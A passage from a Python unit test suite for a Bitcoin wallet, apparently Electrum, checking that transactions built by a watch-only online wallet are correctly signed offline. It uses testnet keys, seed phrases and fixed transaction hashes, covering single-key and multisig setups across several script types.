ebf8cd466bcc2cdcb1f77b92e473d3b13190121030496b9d49aa8efece4f619876c60a77d2c0dc846390ecdc5d9acbfa1bb3128760247304402204d6a9b986e1a0e3473e8aef84b3eb7052442a76dfd7631e35377f141496a55490220131ab342853c01e31f111436f8461e28bc95883b871ca0e01b5f57146e79d7bb012103262ffbc88e25296056a3c65c880e3686297e07f360e6b80f1219d65b0900e84e02483045022100c8ffacf92efa1dddef7e858a241af7a80adcc2489bcc325195970733b1f35fac022076f40c26023a228041a9665c5290b9918d06f03b716e4d8f6d47e79121c7eb37012102d9ba7e02d7cd7dd24302f823b3114c99da21549c663f72440dc87e8ba412120902483045022100b55545d84e43d001bbc10a981f184e7d3b98a7ed6689863716cab053b3655a2f0220537eb76a695fbe86bf020b4b6f7ae93b506d778bbd0885f0a61067616a2c8bce0121034a57f2fa2c32c9246691f6a922fb1ebdf1468792bae7eff253a99fc9f2a5023902483045022100f1d4408463dbfe257f9f778d5e9c8cdb97c8b1d395dbd2e180bc08cad306492c022002a024e19e1a406eaa24467f033659de09ab58822987281e28bb6359288337bd012103e91daa18d924eea62011ce596e15b6d683975cf724ea5bf69a8e2022c26fc12f0247304402204f1e12b923872f396e5e1a3aa94b0b2e86b4ce448f4349a017631db26d7dff8a022069899a05de2ad2bbd8e0202c56ab1025a7db9a4998eea70744e3c367d2a7eb71012103b0eee86792dbef1d4a49bc4ea32d197c8c15d27e6e0c5c33e58e409e26d4a39a0247304402201787dacdb92e0df6ad90226649f0e8321287d0bd8fddc536a297dd19b5fc103e022001fe89300a76e5b46d0e3f7e39e0ee26cc83b71d59a2a5da1dd7b13350cd0c07012103afb1e43d7ec6b7999ef0f1093069e68fe1dfe5d73fc6cfb4f7a5022f7098758c02483045022100acc1212bba0fe4fcc6c3ae5cf8e25f221f140c8444d3c08dfc53a93630ac25da02203f12982847244bd9421ef340293f3a38d2ab5d028af60769e46fcc7d81312e7e012102801bc7170efb82c490e243204d86970f15966aa3bce6a06bef5c09a83a5bfffe024830450221009c04934102402949484b21899271c3991c007b783b8efc85a3c3d24641ac7c24022006fb1895ce969d08a2cb29413e1a85427c7e85426f7a185108ca44b5a0328cb301210360248db4c7d7f76fe231998d2967104fee04df8d8da34f10101cc5523e82648c02483045022100b11fe61b393fa5dbe18ab98f65c249345b429b13f69ee2d1b1335725b24a0e73022010960cdc5565cbc81885c8ed95142435d3c202dfa5a3dc5f50f3914c106335ce0121029c878610c34c21381cda12f6f36ab88bf60f5f496c1b82c357b8ac448713e7b50247304402200ca080db069c15bbf98e1d4dff68d0aea51227ff5d17a8cf67ceae464c22bbb0022051e7331c0918cbb71bb2cef29ca62411454508a16180b0fb5df94248890840df0121028f0be0cde43ff047edbda42c91c37152449d69789eb812bb2e148e4f22472c0f0247304402201fefe258938a2c481d5a745ef3aa8d9f8124bbe7f1f8c693e2ddce4ddc9a927c02204049e0060889ede8fda975edf896c03782d71ba53feb51b04f5ae5897d7431dc012103946730b480f52a43218a9edce240e8b234790e21df5e96482703d81c3c19d3f1024730440220126a6a56dbe69af78d156626fc9cf41d6aac0c07b8b5f0f8491f68db5e89cb5002207ee6ed6f2f41da256f3c1e79679a3de6cf34cc08b940b82be14aefe7da031a6b012102801bc7170efb82c490e243204d86970f15966aa3bce6a06bef5c09a83a5bfffe024730440220363204a1586d7f13c148295122cbf9ec7939685e3cadab81d6d9e921436d21b7022044626b8c2bd4aa7c167d74bc4e9eb9d0744e29ce0ad906d78e10d6d854f23d170121037fb9c51716739bb4c146857fab5a783372f72a65987d61f3b58c74360f4328dd0247304402207925a4c2a3a6b76e10558717ee28fcb8c6fde161b9dc6382239af9f372ace99902204a58e31ce0b4a4804a42d2224331289311ded2748062c92c8aca769e81417a4c012102e18a8c235b48e41ef98265a8e07fa005d2602b96d585a61ad67168d74e7391cb02483045022100bbfe060479174a8d846b5a897526003eb2220ba307a5fee6e1e8de3e4e8b38fd02206723857301d447f67ac98a5a5c2b80ef6820e98fae213db1720f93d91161803b01210386728e2ac3ecee15f58d0505ee26f86a68f08c702941ffaf2fb7213e5026aea10247304402203a2613ae68f697eb02b5b7d18e3c4236966dac2b3a760e3021197d76e9ad4239022046f9067d3df650fcabbdfd250308c64f90757dec86f0b08813c979a42d06a6ec012102a1d7ee1cb4dc502f899aaafae0a2eb6cbf80d9a1073ae60ddcaabc3b1d1f15df02483045022100ab1bea2cc5388428fd126c7801550208701e21564bd4bd00cfd4407cfafc1acd0220508ee587f080f3c80a5c0b2175b58edd84b755e659e2135b3152044d75ebc4b501210236dd1b7f27a296447d0eb3750e1bdb2d53af50b31a72a45511dc1ec3fe7a684a19391400')
funding_txid = funding_tx.txid()
self.assertEqual('98574bc5f6e75769eb0c93d41453cc1dfbd15c14e63cc3c42f37cdbd08858762', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, 'tb1qp0mv2sxsyxxfj5gl0332f9uyez93su9cf26757', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325341
self.assertFalse(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual('ee76c0c6da87f0eb5ab4d1ae05d3942512dcd3c4c42518f9d3619e74400cfc1f', tx_copy.txid())
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx
tx = wallet_offline.sign_transaction(tx_copy, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual('ee76c0c6da87f0eb5ab4d1ae05d3942512dcd3c4c42518f9d3619e74400cfc1f', tx.txid())
self.assertEqual('729c2e40a2fccd6b731407c01ed304119c1ac329bdf9baae5b642d916c5f3272', tx.wtxid())
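
# the tests below import a single WIF private key into the offline wallet and
# watch only the corresponding address online, instead of an xprv/xpub pair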
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_wif_online_addr_p2pkh(self, mock_write): # compressed pubkey
wallet_offline = WalletIntegrityHelper.create_imported_wallet(privkeys=True)
wallet_offline.import_private_key('p2pkh:cQDxbmQfwRV3vP1mdnVHq37nJekHLsuD3wdSQseBRA2ct4MFk5Pq', pw=None)
wallet_online = WalletIntegrityHelper.create_imported_wallet(privkeys=False)
wallet_online.import_address('mg2jk6S5WGDhUPA8mLSxDLWpUoQnX1zzoG')
# bootstrap wallet_online
funding_tx = Transaction('01000000000101197a89cff51096b9dd4214cdee0eb90cb27a25477e739521d728a679724042730100000000fdffffff048096980000000000160014dab37af8fefbbb31887a0a5f9b2698f4a7b45f6a80969800000000001976a91405a20074ef7eb42c7c6fcd4f499faa699742783288ac809698000000000017a914b808938a8007bc54509cd946944c479c0fa6554f87131b2c0400000000160014a04dfdb9a9aeac3b3fada6f43c2a66886186e2440247304402204f5dbb9dda65eab26179f1ca7c37c8baf028153815085dd1bbb2b826296e3b870220379fcd825742d6e2bdff772f347b629047824f289a5499a501033f6c3495594901210363c9c98740fe0455c646215cea9b13807b758791c8af7b74e62968bef57ff8ae1e391400')
funding_txid = funding_tx.txid()
self.assertEqual('0a08ea26a49e2b80f253796d605b69e2d0403fac64bdf6f7db82ada4b7bb6b62', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, 'tb1quk7ahlhr3qmjndy0uvu9y9hxfesrtahtta9ghm', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325340
self.assertFalse(tx.is_complete())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx
tx = wallet_offline.sign_transaction(tx_copy, password=None)
self.assertTrue(tx.is_complete())
self.assertFalse(tx.is_segwit())
self.assertEqual('e56da664631b8c666c6df38ec80c954c4ac3c4f56f040faf0070e4681e937fc4', tx.txid())
self.assertEqual('e56da664631b8c666c6df38ec80c954c4ac3c4f56f040faf0070e4681e937fc4', tx.wtxid())
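
# single imported WIF key, p2wpkh-p2sh variant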
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_wif_online_addr_p2wpkh_p2sh(self, mock_write):
wallet_offline = WalletIntegrityHelper.create_imported_wallet(privkeys=True)
wallet_offline.import_private_key('p2wpkh-p2sh:cU9hVzhpvfn91u2zTVn8uqF2ymS7ucYH8V5TmsTDmuyMHgRk9WsJ', pw=None)
wallet_online = WalletIntegrityHelper.create_imported_wallet(privkeys=False)
wallet_online.import_address('2NA2JbUVK7HGWUCK5RXSVNHrkgUYF8d9zV8')
# bootstrap wallet_online
funding_tx = Transaction('01000000000101197a89cff51096b9dd4214cdee0eb90cb27a25477e739521d728a679724042730100000000fdffffff048096980000000000160014dab37af8fefbbb31887a0a5f9b2698f4a7b45f6a80969800000000001976a91405a20074ef7eb42c7c6fcd4f499faa699742783288ac809698000000000017a914b808938a8007bc54509cd946944c479c0fa6554f87131b2c0400000000160014a04dfdb9a9aeac3b3fada6f43c2a66886186e2440247304402204f5dbb9dda65eab26179f1ca7c37c8baf028153815085dd1bbb2b826296e3b870220379fcd825742d6e2bdff772f347b629047824f289a5499a501033f6c3495594901210363c9c98740fe0455c646215cea9b13807b758791c8af7b74e62968bef57ff8ae1e391400')
funding_txid = funding_tx.txid()
self.assertEqual('0a08ea26a49e2b80f253796d605b69e2d0403fac64bdf6f7db82ada4b7bb6b62', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, 'tb1quk7ahlhr3qmjndy0uvu9y9hxfesrtahtta9ghm', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325340
self.assertFalse(tx.is_complete())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx
tx = wallet_offline.sign_transaction(tx_copy, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual('7642816d051aa3b333b6564bb6e44fe3a5885bfe7db9860dfbc9973a5c9a6562', tx.txid())
self.assertEqual('9bb9949974954613945756c48ca5525cd5cba1b667ccb10c7a53e1ed076a1117', tx.wtxid())
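
# single imported WIF key, native segwit p2wpkh variant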
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_wif_online_addr_p2wpkh(self, mock_write):
wallet_offline = WalletIntegrityHelper.create_imported_wallet(privkeys=True)
wallet_offline.import_private_key('p2wpkh:cPuQzcNEgbeYZ5at9VdGkCwkPA9r34gvEVJjuoz384rTfYpahfe7', pw=None)
wallet_online = WalletIntegrityHelper.create_imported_wallet(privkeys=False)
wallet_online.import_address('tb1qm2eh4787lwanrzr6pf0ekf5c7jnmghm2y9k529')
# bootstrap wallet_online
funding_tx = Transaction('01000000000101197a89cff51096b9dd4214cdee0eb90cb27a25477e739521d728a679724042730100000000fdffffff048096980000000000160014dab37af8fefbbb31887a0a5f9b2698f4a7b45f6a80969800000000001976a91405a20074ef7eb42c7c6fcd4f499faa699742783288ac809698000000000017a914b808938a8007bc54509cd946944c479c0fa6554f87131b2c0400000000160014a04dfdb9a9aeac3b3fada6f43c2a66886186e2440247304402204f5dbb9dda65eab26179f1ca7c37c8baf028153815085dd1bbb2b826296e3b870220379fcd825742d6e2bdff772f347b629047824f289a5499a501033f6c3495594901210363c9c98740fe0455c646215cea9b13807b758791c8af7b74e62968bef57ff8ae1e391400')
funding_txid = funding_tx.txid()
self.assertEqual('0a08ea26a49e2b80f253796d605b69e2d0403fac64bdf6f7db82ada4b7bb6b62', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, 'tb1quk7ahlhr3qmjndy0uvu9y9hxfesrtahtta9ghm', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325340
self.assertFalse(tx.is_complete())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx
tx = wallet_offline.sign_transaction(tx_copy, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual('f8039bd85279f2b5698f15d47f2e338d067d09af391bd8a19467aa94d03f280c', tx.txid())
self.assertEqual('3b7cc3c3352bbb43ddc086487ac696e09f2863c3d9e8636721851b8008a83ffa', tx.wtxid())
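
# the tests below pair an offline xprv keystore with an online wallet that only
# imported the receiving address (no xpub at all)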
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_xprv_online_addr_p2pkh(self, mock_write): # compressed pubkey
wallet_offline = WalletIntegrityHelper.create_standard_wallet(
# bip39: "qwe", der: m/44'/1'/0'
keystore.from_xprv('tprv8gfKwjuAaqtHgqxMh1tosAQ28XvBMkcY5NeFRA3pZMpz6MR4H4YZ3MJM4fvNPnRKeXR1Td2vQGgjorNXfo94WvT5CYDsPAqjHxSn436G1Eu'),
gap_limit=4
)
wallet_online = WalletIntegrityHelper.create_imported_wallet(privkeys=False)
wallet_online.import_address('mg2jk6S5WGDhUPA8mLSxDLWpUoQnX1zzoG')
# bootstrap wallet_online
funding_tx = Transaction('01000000000101197a89cff51096b9dd4214cdee0eb90cb27a25477e739521d728a679724042730100000000fdffffff048096980000000000160014dab37af8fefbbb31887a0a5f9b2698f4a7b45f6a80969800000000001976a91405a20074ef7eb42c7c6fcd4f499faa699742783288ac809698000000000017a914b808938a8007bc54509cd946944c479c0fa6554f87131b2c0400000000160014a04dfdb9a9aeac3b3fada6f43c2a66886186e2440247304402204f5dbb9dda65eab26179f1ca7c37c8baf028153815085dd1bbb2b826296e3b870220379fcd825742d6e2bdff772f347b629047824f289a5499a501033f6c3495594901210363c9c98740fe0455c646215cea9b13807b758791c8af7b74e62968bef57ff8ae1e391400')
funding_txid = funding_tx.txid()
self.assertEqual('0a08ea26a49e2b80f253796d605b69e2d0403fac64bdf6f7db82ada4b7bb6b62', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, 'tb1quk7ahlhr3qmjndy0uvu9y9hxfesrtahtta9ghm', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325340
self.assertFalse(tx.is_complete())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx
tx = wallet_offline.sign_transaction(tx_copy, password=None)
self.assertTrue(tx.is_complete())
self.assertFalse(tx.is_segwit())
self.assertEqual('e56da664631b8c666c6df38ec80c954c4ac3c4f56f040faf0070e4681e937fc4', tx.txid())
self.assertEqual('e56da664631b8c666c6df38ec80c954c4ac3c4f56f040faf0070e4681e937fc4', tx.wtxid())
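
# offline xprv / online imported address, p2wpkh-p2sh variant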
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_xprv_online_addr_p2wpkh_p2sh(self, mock_write):
wallet_offline = WalletIntegrityHelper.create_standard_wallet(
# bip39: "qwe", der: m/49'/1'/0'
keystore.from_xprv('uprv8zHHrMQMQ26utWwNJ5MK2SXpB9hbmy7pbPaneii69xT8cZTyFpxQFxkknGWKP8dxBTZhzy7yP6cCnLrRCQjzJDk3G61SjZpxhFQuB2NR8a5'),
gap_limit=4
)
wallet_online = WalletIntegrityHelper.create_imported_wallet(privkeys=False)
wallet_online.import_address('2NA2JbUVK7HGWUCK5RXSVNHrkgUYF8d9zV8')
# bootstrap wallet_online
funding_tx = Transaction('01000000000101197a89cff51096b9dd4214cdee0eb90cb27a25477e739521d728a679724042730100000000fdffffff048096980000000000160014dab37af8fefbbb31887a0a5f9b2698f4a7b45f6a80969800000000001976a91405a20074ef7eb42c7c6fcd4f499faa699742783288ac809698000000000017a914b808938a8007bc54509cd946944c479c0fa6554f87131b2c0400000000160014a04dfdb9a9aeac3b3fada6f43c2a66886186e2440247304402204f5dbb9dda65eab26179f1ca7c37c8baf028153815085dd1bbb2b826296e3b870220379fcd825742d6e2bdff772f347b629047824f289a5499a501033f6c3495594901210363c9c98740fe0455c646215cea9b13807b758791c8af7b74e62968bef57ff8ae1e391400')
funding_txid = funding_tx.txid()
self.assertEqual('0a08ea26a49e2b80f253796d605b69e2d0403fac64bdf6f7db82ada4b7bb6b62', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, 'tb1quk7ahlhr3qmjndy0uvu9y9hxfesrtahtta9ghm', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325340
self.assertFalse(tx.is_complete())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx
tx = wallet_offline.sign_transaction(tx_copy, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual('7642816d051aa3b333b6564bb6e44fe3a5885bfe7db9860dfbc9973a5c9a6562', tx.txid())
self.assertEqual('9bb9949974954613945756c48ca5525cd5cba1b667ccb10c7a53e1ed076a1117', tx.wtxid())
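
# offline xprv / online imported address, native segwit p2wpkh variant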
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_xprv_online_addr_p2wpkh(self, mock_write):
wallet_offline = WalletIntegrityHelper.create_standard_wallet(
# bip39: "qwe", der: m/84'/1'/0'
keystore.from_xprv('vprv9K9hbuA23Bidgj1KRSHUZMa59jJLeZBpXPVn4RP7sBLArNhZxJjw4AX7aQmVTErDt4YFC11ptMLjbwxgrsH8GLQ1cx77KggWeVPeDBjr9xM'),
gap_limit=4
)
wallet_online = WalletIntegrityHelper.create_imported_wallet(privkeys=False)
wallet_online.import_address('tb1qm2eh4787lwanrzr6pf0ekf5c7jnmghm2y9k529')
# bootstrap wallet_online
funding_tx = Transaction('01000000000101197a89cff51096b9dd4214cdee0eb90cb27a25477e739521d728a679724042730100000000fdffffff048096980000000000160014dab37af8fefbbb31887a0a5f9b2698f4a7b45f6a80969800000000001976a91405a20074ef7eb42c7c6fcd4f499faa699742783288ac809698000000000017a914b808938a8007bc54509cd946944c479c0fa6554f87131b2c0400000000160014a04dfdb9a9aeac3b3fada6f43c2a66886186e2440247304402204f5dbb9dda65eab26179f1ca7c37c8baf028153815085dd1bbb2b826296e3b870220379fcd825742d6e2bdff772f347b629047824f289a5499a501033f6c3495594901210363c9c98740fe0455c646215cea9b13807b758791c8af7b74e62968bef57ff8ae1e391400')
funding_txid = funding_tx.txid()
self.assertEqual('0a08ea26a49e2b80f253796d605b69e2d0403fac64bdf6f7db82ada4b7bb6b62', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, 'tb1quk7ahlhr3qmjndy0uvu9y9hxfesrtahtta9ghm', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325340
self.assertFalse(tx.is_complete())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx
tx = wallet_offline.sign_transaction(tx_copy, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual('f8039bd85279f2b5698f15d47f2e338d067d09af391bd8a19467aa94d03f280c', tx.txid())
self.assertEqual('3b7cc3c3352bbb43ddc086487ac696e09f2863c3d9e8636721851b8008a83ffa', tx.wtxid())
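
# the multisig tests below need two signing rounds: each offline cosigner adds its
# signature, and the partially-signed tx is re-serialized between rounds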
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_hd_multisig_online_addr_p2sh(self, mock_write):
# 2-of-3 legacy p2sh multisig
wallet_offline1 = WalletIntegrityHelper.create_multisig_wallet(
[
keystore.from_seed('blast uniform dragon fiscal ensure vast young utility dinosaur abandon rookie sure', '', True),
keystore.from_xpub('tpubD6NzVbkrYhZ4YTPEgwk4zzr8wyo7pXGmbbVUnfYNtx6SgAMF5q3LN3Kch58P9hxGNsTmP7Dn49nnrmpE6upoRb1Xojg12FGLuLHkVpVtS44'),
keystore.from_xpub('tpubD6NzVbkrYhZ4XJzYkhsCbDCcZRmDAKSD7bXi9mdCni7acVt45fxbTVZyU6jRGh29ULKTjoapkfFsSJvQHitcVKbQgzgkkYsAmaovcro7Mhf')
],
'2of3', gap_limit=2
)
wallet_offline2 = WalletIntegrityHelper.create_multisig_wallet(
[
keystore.from_seed('cycle rocket west magnet parrot shuffle foot correct salt library feed song', '', True),
keystore.from_xpub('tpubD6NzVbkrYhZ4YTPEgwk4zzr8wyo7pXGmbbVUnfYNtx6SgAMF5q3LN3Kch58P9hxGNsTmP7Dn49nnrmpE6upoRb1Xojg12FGLuLHkVpVtS44'),
keystore.from_xpub('tpubD6NzVbkrYhZ4YARFMEZPckrqJkw59GZD1PXtQnw14ukvWDofR7Z1HMeSCxfYEZVvg4VdZ8zGok5VxHwdrLqew5cMdQntWc5mT7mh1CSgrnX')
],
'2of3', gap_limit=2
)
wallet_online = WalletIntegrityHelper.create_imported_wallet(privkeys=False)
wallet_online.import_address('2N4z38eTKcWTZnfugCCfRyXtXWMLnn8HDfw')
# bootstrap wallet_online
funding_tx = Transaction('010000000001016207d958dc46508d706e4cd7d3bc46c5c2b02160e2578e5fad2efafc3927050301000000171600147a4fc8cdc1c2cf7abbcd88ef6d880e59269797acfdffffff02809698000000000017a91480c2353f6a7bc3c71e99e062655b19adb3dd2e48870d0916020000000017a914703f83ef20f3a52d908475dcad00c5144164d5a2870247304402203b1a5cb48cadeee14fa6c7bbf2bc581ca63104762ec5c37c703df778884cc5b702203233fa53a2a0bfbd85617c636e415da72214e359282cce409019319d031766c50121021112c01a48cc7ea13cba70493c6bffebb3e805df10ff4611d2bf559d26e25c04bf391400')
funding_txid = funding_tx.txid()
self.assertEqual('c59913a1fa9b1ef1f6928f0db490be67eeb9d7cb05aa565ee647e859642f3532', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, '2MuCQQHJNnrXzQzuqfUCfAwAjPqpyEHbgue', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325503
self.assertFalse(tx.is_complete())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx - first
tx = wallet_offline1.sign_transaction(tx_copy, password=None)
self.assertFalse(tx.is_complete())
tx = Transaction(tx.serialize())
# sign tx - second
tx = wallet_offline2.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
tx = Transaction(tx.serialize())
self.assertEqual('010000000132352f6459e847e65e56aa05cbd7b9ee67be90b40d8f92f6f11e9bfaa11399c500000000fdfe0000483045022100cfe41e783629a2ad0b1f17cd2dbd69db05763fa7a22691131fa321ba3140d7cb02203fbda2ccc6212315464cd814d4e909b4f80a2361e3af0f9deda06478f91a0f3901483045022100b84fd63e957f2409558f63962fc91ba58334efde8b88ff53ca71da3d0fe7219702206001c6caeb30e18a7525fc72de0003e12646bf815b12fb132c1aadd6ffa1989c014c69522102afb4af9a91264e1c6dce3ebe5312801723270ac0ba8134b7b49129328fcb0f2821030b482838721a38d94847699fed8818b5c5f56500ef72f13489e365b65e5749cf2103e5db7969ae2f2576e6a061bf3bb2db16571e77ffb41e0b27170734359235cbce53aefdffffff02a02526000000000017a9141567b2578f300fa618ef0033611fd67087aff6d187585d72000000000017a91480c2353f6a7bc3c71e99e062655b19adb3dd2e4887bf391400',
str(tx))
self.assertEqual('bb4c28af28b970522c56ff0482cd98c2b78a90bec578bcede8a9e5cbec6ef5e7', tx.txid())
self.assertEqual('bb4c28af28b970522c56ff0482cd98c2b78a90bec578bcede8a9e5cbec6ef5e7', tx.wtxid())
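
# multisig, p2wsh-p2sh (segwit script nested in p2sh) variant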
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_hd_multisig_online_addr_p2wsh_p2sh(self, mock_write):
# 2-of-2 p2sh-embedded segwit multisig
wallet_offline1 = WalletIntegrityHelper.create_multisig_wallet(
[
# bip39: finish seminar arrange erosion sunny coil insane together pretty lunch lunch rose, der: m/1234'/1'/0', p2wsh-p2sh multisig
keystore.from_xprv('Uprv9CvELvByqm8k2dpecJVjgLMX1z5DufEjY4fBC5YvdGF5WjGCa7GVJJ2fYni1tyuF7Hw83E6W2ZBjAhaFLZv2ri3rEsubkCd5avg4EHKoDBN'),
keystore.from_xpub('Upub5Qb8ik4Cnu8g97KLXKgVXHqY6tH8emQvqtBncjSKsyfTZuorPtTZgX7ovKKZHuuVGBVd1MTTBkWez1XXt2weN1sWBz6SfgRPQYEkNgz81QF')
],
'2of2', gap_limit=2
)
wallet_offline2 = WalletIntegrityHelper.create_multisig_wallet(
[
# bip39: square page wood spy oil story rebel give milk screen slide shuffle, der: m/1234'/1'/0', p2wsh-p2sh multisig
keystore.from_xprv('Uprv9BbnKEXJxXaNvdEsRJ9VA9toYrSeFJh5UfGBpM2iKe8Uh7UhrM9K8ioL53s8gvCoGfirHHaqpABDAE7VUNw8LNU1DMJKVoWyeNKu9XcDC19'),
keystore.from_xpub('Upub5RuakRisg8h3F7u7iL2k3UJFa1uiK7xauHamzTxYBbn4PXbM7eajr6M9Q2VCr6cVGhfhqWQqxnABvtSATuVM1xzxk4nA189jJwzaMn1QX7V')
],
'2of2', gap_limit=2
)
wallet_online = WalletIntegrityHelper.create_imported_wallet(privkeys=False)
wallet_online.import_address('2MsHQRm1pNi6VsmXYRxYMcCTdPu7Xa1RyFe')
# bootstrap wallet_online
funding_tx = Transaction('0100000000010118d494d28e5c3bf61566ca0313e22c3b561b888a317d689cc8b47b947adebd440000000017160014aec84704ea8508ddb94a3c6e53f0992d33a2a529fdffffff020f0925000000000017a91409f7aae0265787a02de22839d41e9c927768230287809698000000000017a91400698bd11c38f887f17c99846d9be96321fbf989870247304402206b906369f4075ebcfc149f7429dcfc34e11e1b7bbfc85d1185d5e9c324be0d3702203ce7fc12fd3131920fbcbb733250f05dbf7d03e18a4656232ee69d5c54dd46bd0121028a4b697a37f3f57f6e53f90db077fa9696095b277454fda839c211d640d48649c0391400')
funding_txid = funding_tx.txid()
self.assertEqual('54356de9e156b85c8516fd4d51bdb68b5513f58b4a6147483978ae254627ee3e', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, '2N8CtJRwxb2GCaiWWdSHLZHHLoZy53CCyxf', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325504
self.assertFalse(tx.is_complete())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx - first
tx = wallet_offline1.sign_transaction(tx_copy, password=None)
self.assertFalse(tx.is_complete())
self.assertEqual('6a58a51591142429203b62b6ddf6b799a6926882efac229998c51bee6c3573eb', tx.txid())
tx = Transaction(tx.serialize())
# sign tx - second
tx = wallet_offline2.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
tx = Transaction(tx.serialize())
